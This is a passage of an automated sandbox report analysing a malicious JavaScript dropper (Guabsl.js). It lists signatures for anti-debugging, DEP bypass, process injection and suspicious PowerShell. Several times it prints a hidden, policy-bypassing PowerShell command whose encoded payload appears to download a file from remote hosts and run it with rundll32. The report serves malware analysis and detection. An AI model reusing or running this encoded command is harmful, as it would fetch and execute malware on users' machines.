(CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000308	1	1
ShellExecuteExW May 16, 2023, 10:33 a.m.	show_type: 0 filepath_r: powershell parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABPAHYAZQByAHQAYQBzAGsAcwBSAGUAcABlAHQAYQB0AGkAdgBlAGwAeQAgAD0AIAAiAEEAZABpAHAAbwBzAGUAbgBlAHMAcwBBAGQAaQBhAGIAYQB0ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJABDAGgAYQByAGEAYwB0AGUAcgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACIAUwBoAGUAYgBhAG4AZwBzACIAOwAkAGgAZQB5AGQAYQB5AFAAbABpAG0AcwBvAGwAIAA9ACAAMQA3ADIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AbwBnAHIAYQBwAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAEEAQQB2AEEARwBZAEEAYQBnAEIATwBBAEUAawBBAFYAQQBCAHcAQQBHAE0AQQBMAHcAQQA1AEEARQAwAEEAUgB3AEIANgBBAEcAbwBBAHUATgBtAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBNAEEAQQAxAEEASABFAEEAYwBBAEIAYQBBAEUAawBBAE4AZwBCAEcAQQBFADAAQQBTAGcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABoAGkAYQBsAGEAZQAgAGkAbgAgACQAbQBhAGMAcgBvAHMAZQBpAHMAbQBvAGcAcgBhAHAAaAAgAC0AcwBwAGwAaQB0ACAAIgB1AE4AbQBoACIAKQAgAHsAJABuAG8AbgBmAGEAYwBlAHQAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAbgBlAGUAZABtAGUAbgB0AEIAZQBjAHUAZABnAGUAbABlAGQAIgA7ACQAQQBuAHQAaABvAGcAcgBhAHAAaAB5AFIAZQBmAHIAYQBtAGUAZAAgAD0AIAA0ADYANgA7AHQAcgB5ACAAewAkAFMAcAB1AHQAdABlAHIAZQBkAE0AZQB0AGEAYgBvAGwAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABBAEEAeABSAEsASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBADQAQQBDADQAQQBPAFEAQQA0AEEAQQA9AD0AIgA7ACQAdgBpAGcAZwBsAGUAIAA9ACAANAA3ADgAOwAkAEUAcABoAHIAYQBpAG0AaQB0AGkAYwAgAD0AIAAiAFIAZQBjAG8AZwBuAGkAegBpAG4AZwBQAG8AbABlAGEAeABpAG4AZwAiADsAJABVAG4AaABvAGUAZABUAGUAcgBjAGUAbABlAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABoAGkAYQBsAGEAZQApACkAOwBpAHcAcgAgACQAVQBuAGgAbwBlAGQAVABlAHIAYwBlAGwAZQB0ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABoAG8AbABlAGQAQwBvAG4AYwBlAHAAdAB1AGEAbABpAHoAZQBkAC4AdAByAGEAZABlAHMAcABlAHIAcwBvAG4AVQBuAHIAaQBmAGYAbABlAGQAOwAkAEkAbQBwAGUAdAByAGEAdABpAG4AZwAgAD0AIAA1ADMAOAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB0AGgAbwBsAGUAZABDAG8AbgBjAGUAcAB0AHUAYQBsAGkAegBlAGQALgB0AHIAYQBkAGUAcwBwAGUAcgBzAG8AbgBVAG4AcgBpAGYAZgBsAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADYAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBkAEEAQgBvAEEARwA4AEEAYgBBAEIAbABBAEcAUQBBAFEAdwBCAHYAQQBHADQAQQBZAHcAQgBsAEEASABBAEEAZABBAEIAMQBBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAeQBBAEcARQBBAFoAQQBCAGwAQQBIAE0AQQBjAEEAQgBsAEEASABJAEEAYwB3AEIAdgBBAEcANABBAFYAUQBCAHUAQQBIAEkAQQBhAFEAQgBtAEEARwBZAEEAYgBBAEIAbABBAEcAUQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAGcAcgBhAG4AZwBlAHIAaQBzAGUAcgBBAHQAaABlAG8AbABvAGcAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB4AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAeQBBAEEAPQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBZAHcAQgAwAEEASABVAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAFEAQQBkAGcAQQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABZAEEATgBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQAxAEEAQQA9AD0AVAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGIAdwBCAHYAQQBHAHcAQQBiAFEAQgBoAEEARwBzAEEAWgBRAEIAeQBBAEUATQBBAGEAQQBCADUAQQBHAHcAQQBiAHcAQgBqAEEARwBFAEEAZABRAEIAcwBBAEgAawBBAEwAZwBCAHUAQQBIAEkAQQBkAHcAQQA9ACIAOwAkAFMAdABhAHQAdQBhAHIAaQBzAG0AIAA9ACAAIgBQAHIAZQBmAHUAbABnAGUAbgB0AE8AcwB0AGUAbwBtAGEAdABvAGkAZAAiADsAYgByAGUAYQBrADsATgBlAHgAdABKAFMAOwB9AE4AZQB4AHQASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABiAGUAYQByAHcAYQByAGQAIAA9ACAANAAwADYAOwB9AH0AJABzAG4AYQBwAHAAaQBzAGgATABlAGgAcgBtAGEAbgAgAD0AIAA3ADMAOAA7AA==" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 16, 2023, 10:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABPAHYAZQByAHQAYQBzAGsAcwBSAGUAcABlAHQAYQB0AGkAdgBlAGwAeQAgAD0AIAAiAEEAZABpAHAAbwBzAGUAbgBlAHMAcwBBAGQAaQBhAGIAYQB0ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJABDAGgAYQByAGEAYwB0AGUAcgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACIAUwBoAGUAYgBhAG4AZwBzACIAOwAkAGgAZQB5AGQAYQB5AFAAbABpAG0AcwBvAGwAIAA9ACAAMQA3ADIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AbwBnAHIAYQBwAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAEEAQQB2AEEARwBZAEEAYQBnAEIATwBBAEUAawBBAFYAQQBCAHcAQQBHAE0AQQBMAHcAQQA1AEEARQAwAEEAUgB3AEIANgBBAEcAbwBBAHUATgBtAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBNAEEAQQAxAEEASABFAEEAYwBBAEIAYQBBAEUAawBBAE4AZwBCAEcAQQBFADAAQQBTAGcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABoAGkAYQBsAGEAZQAgAGkAbgAgACQAbQBhAGMAcgBvAHMAZQBpAHMAbQBvAGcAcgBhAHAAaAAgAC0AcwBwAGwAaQB0ACAAIgB1AE4AbQBoACIAKQAgAHsAJABuAG8AbgBmAGEAYwBlAHQAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAbgBlAGUAZABtAGUAbgB0AEIAZQBjAHUAZABnAGUAbABlAGQAIgA7ACQAQQBuAHQAaABvAGcAcgBhAHAAaAB5AFIAZQBmAHIAYQBtAGUAZAAgAD0AIAA0ADYANgA7AHQAcgB5ACAAewAkAFMAcAB1AHQAdABlAHIAZQBkAE0AZQB0AGEAYgBvAGwAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABBAEEAeABSAEsASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBADQAQQBDADQAQQBPAFEAQQA0AEEAQQA9AD0AIgA7ACQAdgBpAGcAZwBsAGUAIAA9ACAANAA3ADgAOwAkAEUAcABoAHIAYQBpAG0AaQB0AGkAYwAgAD0AIAAiAFIAZQBjAG8AZwBuAGkAegBpAG4AZwBQAG8AbABlAGEAeABpAG4AZwAiADsAJABVAG4AaABvAGUAZABUAGUAcgBjAGUAbABlAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABoAGkAYQBsAGEAZQApACkAOwBpAHcAcgAgACQAVQBuAGgAbwBlAGQAVABlAHIAYwBlAGwAZQB0ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABoAG8AbABlAGQAQwBvAG4AYwBlAHAAdAB1AGEAbABpAHoAZQBkAC4AdAByAGEAZABlAHMAcABlAHIAcwBvAG4AVQBuAHIAaQBmAGYAbABlAGQAOwAkAEkAbQBwAGUAdAByAGEAdABpAG4AZwAgAD0AIAA1ADMAOAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB0AGgAbwBsAGUAZABDAG8AbgBjAGUAcAB0AHUAYQBsAGkAegBlAGQALgB0AHIAYQBkAGUAcwBwAGUAcgBzAG8AbgBVAG4AcgBpAGYAZgBsAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADYAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBkAEEAQgBvAEEARwA4AEEAYgBBAEIAbABBAEcAUQBBAFEAdwBCAHYAQQBHADQAQQBZAHcAQgBsAEEASABBAEEAZABBAEIAMQBBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAeQBBAEcARQBBAFoAQQBCAGwAQQBIAE0AQQBjAEEAQgBsAEEASABJAEEAYwB3AEIAdgBBAEcANABBAFYAUQBCAHUAQQBIAEkAQQBhAFEAQgBtAEEARwBZAEEAYgBBAEIAbABBAEcAUQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAGcAcgBhAG4AZwBlAHIAaQBzAGUAcgBBAHQAaABlAG8AbABvAGcAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB4AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAeQBBAEEAPQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBZAHcAQgAwAEEASABVAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAFEAQQBkAGcAQQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABZAEEATgBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQAxAEEAQQA9AD0AVAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGIAdwBCAHYAQQBHAHcAQQBiAFEAQgBoAEEARwBzAEEAWgBRAEIAeQBBAEUATQBBAGEAQQBCADUAQQBHAHcAQQBiAHcAQgBqAEEARwBFAEEAZABRAEIAcwBBAEgAawBBAEwAZwBCAHUAQQBIAEkAQQBkAHcAQQA9ACIAOwAkAFMAdABhAHQAdQBhAHIAaQBzAG0AIAA9ACAAIgBQAHIAZQBmAHUAbABnAGUAbgB0AE8AcwB0AGUAbwBtAGEAdABvAGkAZAAiADsAYgByAGUAYQBrADsATgBlAHgAdABKAFMAOwB9AE4AZQB4AHQASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABiAGUAYQByAHcAYQByAGQAIAA9ACAANAAwADYAOwB9AH0AJABzAG4AYQBwAHAAaQBzAGgATABlAGgAcgBtAGEAbgAgAD0AIAA3ADMAOAA7AA=="
parent_process	wscript.exe	martian_process	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABPAHYAZQByAHQAYQBzAGsAcwBSAGUAcABlAHQAYQB0AGkAdgBlAGwAeQAgAD0AIAAiAEEAZABpAHAAbwBzAGUAbgBlAHMAcwBBAGQAaQBhAGIAYQB0ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJABDAGgAYQByAGEAYwB0AGUAcgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACIAUwBoAGUAYgBhAG4AZwBzACIAOwAkAGgAZQB5AGQAYQB5AFAAbABpAG0AcwBvAGwAIAA9ACAAMQA3ADIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AbwBnAHIAYQBwAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAEEAQQB2AEEARwBZAEEAYQBnAEIATwBBAEUAawBBAFYAQQBCAHcAQQBHAE0AQQBMAHcAQQA1AEEARQAwAEEAUgB3AEIANgBBAEcAbwBBAHUATgBtAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBNAEEAQQAxAEEASABFAEEAYwBBAEIAYQBBAEUAawBBAE4AZwBCAEcAQQBFADAAQQBTAGcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABoAGkAYQBsAGEAZQAgAGkAbgAgACQAbQBhAGMAcgBvAHMAZQBpAHMAbQBvAGcAcgBhAHAAaAAgAC0AcwBwAGwAaQB0ACAAIgB1AE4AbQBoACIAKQAgAHsAJABuAG8AbgBmAGEAYwBlAHQAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAbgBlAGUAZABtAGUAbgB0AEIAZQBjAHUAZABnAGUAbABlAGQAIgA7ACQAQQBuAHQAaABvAGcAcgBhAHAAaAB5AFIAZQBmAHIAYQBtAGUAZAAgAD0AIAA0ADYANgA7AHQAcgB5ACAAewAkAFMAcAB1AHQAdABlAHIAZQBkAE0AZQB0AGEAYgBvAGwAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABBAEEAeABSAEsASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBADQAQQBDADQAQQBPAFEAQQA0AEEAQQA9AD0AIgA7ACQAdgBpAGcAZwBsAGUAIAA9ACAANAA3ADgAOwAkAEUAcABoAHIAYQBpAG0AaQB0AGkAYwAgAD0AIAAiAFIAZQBjAG8AZwBuAGkAegBpAG4AZwBQAG8AbABlAGEAeABpAG4AZwAiADsAJABVAG4AaABvAGUAZABUAGUAcgBjAGUAbABlAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABoAGkAYQBsAGEAZQApACkAOwBpAHcAcgAgACQAVQBuAGgAbwBlAGQAVABlAHIAYwBlAGwAZQB0ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABoAG8AbABlAGQAQwBvAG4AYwBlAHAAdAB1AGEAbABpAHoAZQBkAC4AdAByAGEAZABlAHMAcABlAHIAcwBvAG4AVQBuAHIAaQBmAGYAbABlAGQAOwAkAEkAbQBwAGUAdAByAGEAdABpAG4AZwAgAD0AIAA1ADMAOAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB0AGgAbwBsAGUAZABDAG8AbgBjAGUAcAB0AHUAYQBsAGkAegBlAGQALgB0AHIAYQBkAGUAcwBwAGUAcgBzAG8AbgBVAG4AcgBpAGYAZgBsAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADYAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBkAEEAQgBvAEEARwA4AEEAYgBBAEIAbABBAEcAUQBBAFEAdwBCAHYAQQBHADQAQQBZAHcAQgBsAEEASABBAEEAZABBAEIAMQBBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAeQBBAEcARQBBAFoAQQBCAGwAQQBIAE0AQQBjAEEAQgBsAEEASABJAEEAYwB3AEIAdgBBAEcANABBAFYAUQBCAHUAQQBIAEkAQQBhAFEAQgBtAEEARwBZAEEAYgBBAEIAbABBAEcAUQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAGcAcgBhAG4AZwBlAHIAaQBzAGUAcgBBAHQAaABlAG8AbABvAGcAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB4AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAeQBBAEEAPQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBZAHcAQgAwAEEASABVAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAFEAQQBkAGcAQQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABZAEEATgBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQAxAEEAQQA9AD0AVAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGIAdwBCAHYAQQBHAHcAQQBiAFEAQgBoAEEARwBzAEEAWgBRAEIAeQBBAEUATQBBAGEAQQBCADUAQQBHAHcAQQBiAHcAQgBqAEEARwBFAEEAZABRAEIAcwBBAEgAawBBAEwAZwBCAHUAQQBIAEkAQQBkAHcAQQA9ACIAOwAkAFMAdABhAHQAdQBhAHIAaQBzAG0AIAA9ACAAIgBQAHIAZQBmAHUAbABnAGUAbgB0AE8AcwB0AGUAbwBtAGEAdABvAGkAZAAiADsAYgByAGUAYQBrADsATgBlAHgAdABKAFMAOwB9AE4AZQB4AHQASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABiAGUAYQByAHcAYQByAGQAIAA9ACAANAAwADYAOwB9AH0AJABzAG4AYQBwAHAAaQBzAGgATABlAGgAcgBtAGEAbgAgAD0AIAA3ADMAOAA7AA=="
parent_process	wscript.exe	martian_process	wscript "C:\Users\test22\AppData\Local\Temp\Guabsl.js" devolvementNonhectic SemicoagulatedTogawise Menhir
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Guabsl.js" devolvementNonhectic SemicoagulatedTogawise Menhir

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2688
Process injection	Process 2688 resumed a thread in remote process 2808
NtResumeThread May 16, 2023, 10:33 a.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 2688	1	0	0
NtResumeThread May 16, 2023, 10:33 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2808	1	0	0

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Guabsl.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All